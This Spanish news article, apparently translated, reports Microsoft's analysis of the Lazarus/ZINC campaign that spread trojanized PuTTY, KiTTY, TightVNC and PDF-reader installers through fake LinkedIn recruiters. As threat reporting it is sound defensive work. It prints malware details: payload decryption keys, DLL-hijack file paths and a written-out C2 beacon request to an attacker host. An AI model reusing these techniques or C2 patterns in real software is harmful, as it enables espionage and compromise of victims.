Una cantidad considerable de organizaciones fueron hackeadas luego de haber instalado aplicaciones de código abierto convertidas en armas. Se dice que este ataque fue financiado por el gobierno de Corea del Norte.
La empresa de tecnología Microsoft, aseguró que los ciberdelincuentes "están convirtiendo en armas conocidas piezas de software de código abierto en una campaña que ya ha logrado comprometer a "numerosas" organizaciones de los medios de comunicación, la defensa y la industria aeroespacial y las industrias de servicios de TI."
ZINC, el nombre de Microsoft para un grupo de actores de amenazas también llamado Lazarus, que es más conocido por llevar a cabo el devastador compromiso de 2014 de Sony Pictures Entertainment ha estado mezclando PuTTY y otras aplicaciones legítimas de código abierto con código altamente encriptado que finalmente instala malware de espionaje.
A continuación, los hackers se hacen pasar por reclutadores de empleo y se ponen en contacto con personas de las organizaciones objetivo a través de LinkedIn. Tras desarrollar un nivel de confianza a lo largo de una serie de conversaciones y eventualmente trasladarlas al mensajero WhatsApp, los hackers instruyen a los individuos para que instalen las aplicaciones, que infectan los entornos de trabajo de los empleados.
"Los actores han logrado comprometer a numerosas organizaciones desde junio de 2022", escribieron en un post los miembros de los equipos de Inteligencia de Amenazas de Seguridad de Microsoft y de Prevención y Defensa de Amenazas de LinkedIn. "Debido al amplio uso de las plataformas y el software que utiliza ZINC en esta campaña, ZINC podría suponer una amenaza significativa para individuos y organizaciones en múltiples sectores y regiones."
Los objetivos de este ataque son PuTTY, KiTTY, TightVNC, Sumatra PDF Reader y muPDF/Subliminal Recording.
PuTTY es un popular emulador de terminal, consola en serie y aplicación de transferencia de archivos de red que soporta protocolos de red, incluyendo SSH, SCP, Telnet, rlogin y conexión de socket en bruto. Hace dos semanas, la empresa de seguridad Mandiant advirtió que hackers vinculados a Corea del Norte lo habían troyanizado en una campaña que logró comprometer la red de un cliente. La publicación del jueves decía que los mismos hackers también han armado KiTTY, TightVNC, Sumatra PDF Reader y muPDF/Subliminal Recording con código que instala el mismo malware de espionaje, al que Microsoft ha llamado ZetaNile.
Lazarus fue una vez una banda de hackers con recursos y habilidades marginales. En la última década, su destreza ha crecido considerablemente. Sus ataques a las bolsas de criptomonedas en los últimos cinco años han generado miles de millones de dólares para los programas de armas de destrucción masiva del país. Regularmente encuentran y explotan vulnerabilidades de día cero en aplicaciones fuertemente fortificadas y utilizan muchas de las mismas técnicas de malware utilizadas por otros grupos patrocinados por el Estado.
El grupo se basa principalmente en el phishing selectivo como vector inicial para llegar a sus víctimas, pero a veces también utilizan otras formas de ingeniería social y de compromiso de sitios web. Un tema común es que los miembros se dirigen a los empleados de las organizaciones que quieren comprometer, a menudo engañándolos o coaccionándolos para que instalen software troyanizado.
Las aplicaciones troyanizadas PuTTY y KiTTY observadas por Microsoft utilizan un mecanismo inteligente para garantizar que sólo se infecten los objetivos previstos y que no se infecten otros inadvertidamente. Los instaladores de las aplicaciones no ejecutan ningún código malicioso. En cambio, el malware ZetaNile se instala sólo cuando las aplicaciones se conectan a una dirección IP específica y utilizan las credenciales de inicio de sesión que los falsos reclutadores proporcionan a los objetivos.
El ejecutable PuTTY troyanizado utiliza una técnica llamada secuestro de orden de búsqueda de DLL, que carga y descifra una carga útil de segunda etapa cuando se presenta con la clave "0CE1241A44557AA438F27BC6D4ACA246" para su uso como comando y control. Una vez conectada con éxito al servidor C2, los atacantes pueden instalar malware adicional en el dispositivo comprometido. La aplicación KiTTY funciona de la misma manera.
Al igual que KiTTY y PuTTY, el TightVNC Viewer malicioso instala su carga útil final sólo cuando el usuario selecciona ec2-aet-tech.w-ada[.]amazonaws en el menú desplegable de hosts remotos precargados en el TightVNC Viewer.
Foto de Microsoft
El post del jueves continuaba:
"La versión troyanizada de Sumatra PDF Reader, llamada SecurePDF.exe, ha sido utilizada por ZINC desde al menos 2019 y sigue siendo una técnica única de ZINC. SecurePDF.exe es un cargador modularizado que puede instalar el implante ZetaNile cargando un archivo temático de aplicación de trabajo armado con una extensión .PDF. El PDF falso contiene una cabecera "SPV005", una clave de descifrado, la carga útil del implante de segunda etapa cifrada y un PDF señuelo cifrado, que se muestra en el Sumatra PDF Reader cuando se abre el archivo.
Una vez cargado en la memoria, el malware de segunda etapa está configurado para enviar el nombre de host del sistema de la víctima y la información del dispositivo utilizando algoritmos de codificación personalizados a un servidor de comunicación C2 como parte del proceso de registro C2. Los atacantes pueden instalar malware adicional en los dispositivos comprometidos utilizando la comunicación C2 según sea necesario."
Foto de Microsoft
El post continuaba: Dentro de la versión troyanizada del instalador de muPDF/Subliminal Recording, setup.exe está configurado para comprobar si la ruta de archivo ISSetupPrerequisites\Setup64.exe existe y escribir C:\colrctl\colorui.dll en el disco después de extraer el ejecutable incrustado dentro de setup.exe. Luego copia C:\Windows\System32\ColorCpl.exe a C:\ColorCtrl\ColorCpl.exe. Para la segunda etapa del malware, el instalador malicioso crea un nuevo proceso C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D, y el argumento C3A9B30B6A313F289297C9A36730DB6D se pasa a colorui.dll como clave de descifrado. La DLL colorui.dll, que Microsoft está rastreando como la familia de malware EventHorizon, se inyecta en C:\Windows\System\credwiz.exe o iexpress.exe para enviar peticiones HTTP C2 como parte del proceso de registro de la víctima y para obtener una carga útil adicional. POST /support/support.asp HTTP/1.1 Cache-Control: no-cache Conexión: close Content-Type: application/x-www-form-urlencoded Aceptar: / Usuario-Agente: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) Contenido-Longitud: 125 Host: www.elite4print[.]com bbs=[payload encriptado]= &article=[payload encriptado]
El post proporciona indicadores técnicos que las organizaciones pueden buscar para determinar si algún punto final dentro de sus redes está infectado. También incluye direcciones IP utilizadas en la campaña que los administradores pueden añadir a sus listas de bloqueo de red.